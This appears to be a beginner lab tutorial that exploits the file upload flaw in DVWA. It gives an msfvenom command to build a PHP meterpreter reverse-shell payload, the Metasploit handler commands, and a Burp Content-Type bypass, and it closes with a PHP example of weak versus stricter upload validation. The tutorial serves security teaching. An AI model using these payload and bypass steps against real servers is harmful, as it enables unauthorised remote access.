
Beginner's guide to file upload vulnerability

In this article we will learn about the file upload vulnerability and how it can be used to get a session.

Table of contents:

  1. Introduction

  2. Practical implementation on DVWA


File upload vulnerability is a web-based vulnerability that allows attackers to upload a malicious file directly and then execute it via a web browser. In this article we will try this vulnerability on DVWA at different security levels and will try to get a session by executing the malicious file.

Practical implementation on DVWA

We will start with DVWA at low security: go to DVWA Security, set the level to Low, then go to the File Upload tab.

As we can see, the page asks us to upload a file. So let's create our malicious file using msfvenom.

Command used: msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -o /root/Desktop/haclabs.php

  • -p means payload to use

  • lhost is the listener address

  • lport is the listener port

  • -o is used to specify the path to save the file

Now choose the file and click on the Upload button.

We have uploaded the file successfully, and ../../hackable/uploads/haclabs.php is the path where the file is uploaded. We will use this path to execute our script.

But before that, open Metasploit and set up everything to get a session.

Commands used:

  • use exploit/multi/handler

  • set payload php/meterpreter/reverse_tcp

  • set lhost

  • set lport 4444

  • exploit

Please change lhost and lport according to the IP address and port number you provided while creating the malicious PHP file.

Now it's time to execute the uploaded file.

Copy and paste the path ../../hackable/uploads/haclabs.php into the URL and press Enter.

We have a session and this is what we want.

Now change the security level to medium; we will use the same PHP file to upload and to get the session.

After changing to the medium level, go to the File Upload tab and try to upload the same PHP file.

This time we failed to upload the file: the application responds that it only accepts JPEG or PNG images.

No problem: open Burp Suite and intercept the request when we click on the Upload button.

Now change Content-Type: application/x-php to Content-Type: image/jpeg and click on Forward, and then we can see the file is uploaded. The upload passes because the check relies on the Content-Type value sent in the request, which the client controls.

After uploading the file, we followed the same steps to get a session.
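
The medium-level result above comes from a server that trusts the Content-Type sent in the request. The following is an added example, not DVWA's code and not part of the original article: it puts that weak check beside a stricter one that validates the extension and the file's leading bytes and picks the stored filename itself. The function names (weak_check, strict_check, sample) and the sample files are constructed for illustration.

```php
<?php
// Added example (not DVWA's code). All names and sample data are constructed.

// Weak check: trusts the Content-Type supplied by the client.
function weak_check(array $file): bool {
    return in_array($file['type'], ['image/jpeg', 'image/png'], true);
}

// Stricter check: ignores the client-supplied type, validates extension and content.
// Returns the server-chosen filename to store under, or null to reject.
function strict_check(array $file): ?string {
    $allowed = [
        'jpg'  => "\xFF\xD8\xFF",
        'jpeg' => "\xFF\xD8\xFF",
        'png'  => "\x89PNG\r\n\x1A\n",
    ];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null; // extension is not on the allowlist
    }
    $sig  = $allowed[$ext];
    $head = file_get_contents($file['tmp_name'], false, null, 0, 8);
    if ($head === false || strncmp($head, $sig, strlen($sig)) !== 0) {
        return null; // content does not start with the expected image signature
    }
    // The client never controls the stored name or its extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Builds a constructed upload shaped like one entry of $_FILES.
function sample(string $name, string $type, string $bytes): array {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    return ['name' => $name, 'type' => $type, 'tmp_name' => $tmp];
}

// A script sent with an image Content-Type, and a file with a PNG signature.
$script = sample('haclabs.php', 'image/jpeg', "<?php // constructed placeholder");
$photo  = sample('photo.png', 'image/png', "\x89PNG\r\n\x1A\n" . str_repeat("\0", 16));

foreach ([$script, $photo] as $f) {
    printf("%-12s weak=%-6s strict=%s\n", $f['name'],
        weak_check($f) ? 'accept' : 'reject',
        strict_check($f) ?? 'reject');
    unlink($f['tmp_name']);
}
```

A signature check only looks at the first bytes, so the upload directory should also be served with script execution disabled, or kept outside the web root.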